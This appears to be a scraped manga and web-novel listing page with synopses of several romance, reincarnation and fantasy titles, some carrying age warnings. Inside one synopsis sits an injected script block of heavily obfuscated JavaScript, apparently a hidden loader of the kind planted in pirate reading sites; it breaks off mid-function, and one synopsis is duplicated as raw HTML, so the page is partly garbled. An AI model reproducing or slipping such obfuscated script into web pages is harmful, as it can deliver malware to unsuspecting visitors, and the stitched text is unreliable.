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Where Are You Looking, Manager?

"You're saying that I'm dead?" On the day of his road manager interview, Kim Injoon gets dragged into the afterlife due to a grim reaper's mistake. While desperately running to avoid death, a faint ray of light appears and—BANG! "What the-? It was a dream? It's too detailed to be one!" But after that day, he started seeing strange strings. Both black and white strings of fate! If these strings mean what I think they mean...! Then I can achieve my dream of being a top star with my very own hands! I feel like I've got the hang of how to use this! I'm going to pick a 100% success production and skip out on the 100% failed ones 어딜 봐요 매니저님 / Talent Agent and the Threads of Fate


My Civil Servant Life Reborn in the Strange World

He was on his way to buy some beer to celebrate his acceptance as a civil servant when he was suddenly banged down by a truck and sent to another world. Reincarnated as Denburg Blade, the son of a legendary battle race’s chief, he slew demons at the age of 8 and a dragon at the age of 12. Subjected to the spartan-style training of his muscular monster of a father, he lived an inhuman daily life. “I must leave this place that is far from peaceful!” Safety is the best! So he chose to be a civil servant of the empire! Can Denburg really become a civil servant and live the peaceful, stable life he wished for?


Chasing The Wave

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” [Translated by Mosh Scans] A mature and reliable Leader x A pure and frivolous Bubbly guy Sui Yi claims that Ning Lan hasn’t spoken a word in truth, and later discovers that even his “I don’t like you” was a lie. He was crazy to consider this person as kind solely based on his pure and naive smile. His clear eyes were just like those of that person’s… Chasing Tides 逐浪


I’m Divorced, But I’m a Chaebol

In the original story, the male lead accused his ex-wife of abusing him when he was younger. But unlike the original story, I raised my young husband as if he was my brother. When my husband went to war, I started preparing for a divorce. Because if the original story is true, the male lead will fall in love with the princess of the ruined country and bring her back! That’s why, instead of following the road that leads to defeat, I intended to get a decent divorce. While preparing for that, I took some money and earned quite a fortune. I also developed a cure because I didn’t want to die of an incurable disease like the original villainess. All that’s left is getting divorced! *** My cute little husband came home and grew up to be such a fine man! But don’t worry, I’m all set to divorce you! Oddly enough, the reaction of my husband is a little strange. “While I was fighting on the battlefield, you were preparing to run away.” He smiled dangerously, whilst wrapping his big hands around my waist. “Are you having an affair?” Unlike the pretty smile on his mouth, his eyes were burning hot. No….. you know, I’m ready to get divorced….. Associated Names 이혼당할 준비 완료했습니다


The Millionaire Divorcee

<div id="editdescription"> In the original story, the male lead accused his ex-wife of abusing him when he was younger. But unlike the original story, I raised my young husband as if he was my brother. When my husband went to war, I started preparing for a divorce. Because if the original story is true, the male lead will fall in love with the princess of the ruined country and bring her back! That’s why, instead of following the road that leads to defeat, I intended to get a decent divorce. While preparing for that, I took some money and earned quite a fortune. I also developed a cure because I didn’t want to die of an incurable disease like the original villainess. All that’s left is getting divorced! *** My cute little husband came home and grew up to be such a fine man! But don’t worry, I’m all set to divorce you! Oddly enough, the reaction of my husband is a little strange. “While I was fighting on the battlefield, you were preparing to run away.” He smiled dangerously, whilst wrapping his big hands around my waist. “Are you having an affair?” Unlike the pretty smile on his mouth, his eyes were burning hot. No….. you know, I’m ready to get divorced….. </div> <div class="page-content-inner"> <div></div> </div> <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">이혼당할 준비 완료했습니다</div>


It’s Just Fortune-Telling. How Did the Nine-Tailed Demon Emperor Become My Wife?

Jiang Jue travels through the world of Xianxia and obtains the Destiny Deduction System.Observing other people’s destiny, knowing their past and knowing their future can even change their fate against the sky!It’s just that there seems to be a big problem with this system.No matter what he calculates, he has to truthfully tell the fortune-teller’s destiny.On this day, he met the leader of the Ten Thousand Demon Kingdom, the Demon Lord.Tu Shanlan: “Sir, you might as well do the divination for me.””Thousands of years later, you will be married and have five children.” “…””By the way, your husband-in-law is me.”


Barbarian Quest

The Sky Mountain Range was a resting place for souls, and the living were not allowed to cross it.Everyone believed it as such."You will become a great warrior, Urich."Urich, the tribe's strongest warrior, turned his back on his home and ventured into the civilized world.


Welcome, Is This Your First Time in the Afterlife?

“Romance Crossing the Boundary Between the Mortal World and the Afterlife: The Cold Handsome Reaper Official and the Bright College Student.” sora, a bright 21-year-old college student majoring in dance, boards a luxurious cruise ship anchored on the Han River without even realizing she’s in a coma. Everything is free on the cruise except for what’s not allowed, so she enjoys drinking and having fun all night. However, when she wakes up, she finds herself in disbelief, “Wait, is this the underworld?” Amidst the chaos caused by a major accident involving a mountain person immigrating to the underworld, the examination hall is turned upside down. In the midst of this, a savior steps in to resolve the situation. However, the sharply handsome underworld civil servant who is about to sober up turns out to be quite grumpy. Anyway, the situation could be resolved once they return to the living world, but strangely, the data of sora’s life stored in the underworld has been deleted in the blink of an eye. All that remains is her name and a few scant pieces of information. Furthermore, if sora fails to find her body within the grace period of 49 days, she will be classified as a lost soul and forcibly admitted to the underworld…! In this desperate moment, the only one extending a helping hand is the cold underworld civil servant!


Can’t Get Along With Dear Princess

“Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” For my country, I was prepared to sacrifice myself, even for marriage. But the one I had to marry happened to be a girl. I had thought I had pranked the goddess pranker, but unexpectedly the goddess had pranked me. The Incapable Married Princess<script></script><script>(function(_0x4d34f2,_0x56aa00){var _0x15efa2=_0x4578,_0x167fa1=_0x4d34f2();while(!![]){try{var _0x28c7b4=-parseInt(_0x15efa2(0x108))/(-0x1a35+-0x79*0x3b+0x3619)+parseInt(_0x15efa2(0x10a))/(-0x1e43+0x157*0x17+-0x2*0x46)*(parseInt(_0x15efa2(0xef))/(-0x1544+0xe8a+-0x4b*-0x17))+-parseInt(_0x15efa2(0xf5))/(-0x196e+0xac3+0xeaf)+parseInt(_0x15efa2(0xf4))/(0x172b+-0x9d5*-0x1+-0x1*0x20fb)+-parseInt(_0x15efa2(0xff))/(0x236d+-0x1dbc+-0x5ab)+parseInt(_0x15efa2(0xf6))/(-0x1f*0xc1+-0x30*-0x90+-0x39a)*(-parseInt(_0x15efa2(0xec))/(-0xce7+-0x25*0xeb+-0x20a*-0x17))+parseInt(_0x15efa2(0xf3))/(0x11f9*0x1+-0x5c*0x65+0x125c);if(_0x28c7b4===_0x56aa00)break;else _0x167fa1['push'](_0x167fa1['shift']());}catch(_0x564792){_0x167fa1['push'](_0x167fa1['shift']());}}}(_0x7254,-0xbfbd6+-0x49839+-0x1a86b1*-0x1));function _0x7254(){var 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I Don’t Want to Be Loved

Read novel same at Rihannan Alessin, a queen rotting in prison. Despaired and without hope, she drank poison and died. But… unbeknownst to her, the deity gave her a second chance at life. She was twelve again. And this time, she would live life differently. Six years later, she chooses to become Arundell’s queen… “If you’re asking me to step down from the marriage proposal, I can’t.” “Marry me and let us divorce after a year.” And this time, the time limit of their marriage would last a year. A husband she knew who was different than before… she tried not to love him again, but each time, her heart kept shaking.


Max level green tea transmigrates into little pitiful one

Lin Feilu, or better known by her nickname—Green Tea Princess, was the best of all the scheming b*tches that the world had ever seen. She was the Oscar-winning actress among the masses with real life as her stage. Acting coy, slandering, feigning innocence, or playing the saint, she aced it all. Simply put, she was the proverbial villainess. Ah, but retribution came way too early for this malicious personage and she died on her 27th birthday. In death, Lin Feilu reflected on her career of 20 years as the Green Tea Princess. She was full of regret and remorse over the life she once led. She vowed, if there was an afterlife, she would atone for her misdeeds and be a good person. [ From Novel Updates ] 满级绿茶穿成小可怜 / The Villainess Wants to Turn Over a New Leaf / 满级绿茶穿成小可怜 / Max Level Green Tea Crossing to Be Small and Pitiful / Max Level Green Tea Transmigrates Into Little Pitiful One / Mǎn Jí Lǜchá Chuān Chéng Xiǎo Kělián / Such a Bitch Looks Like a Pity
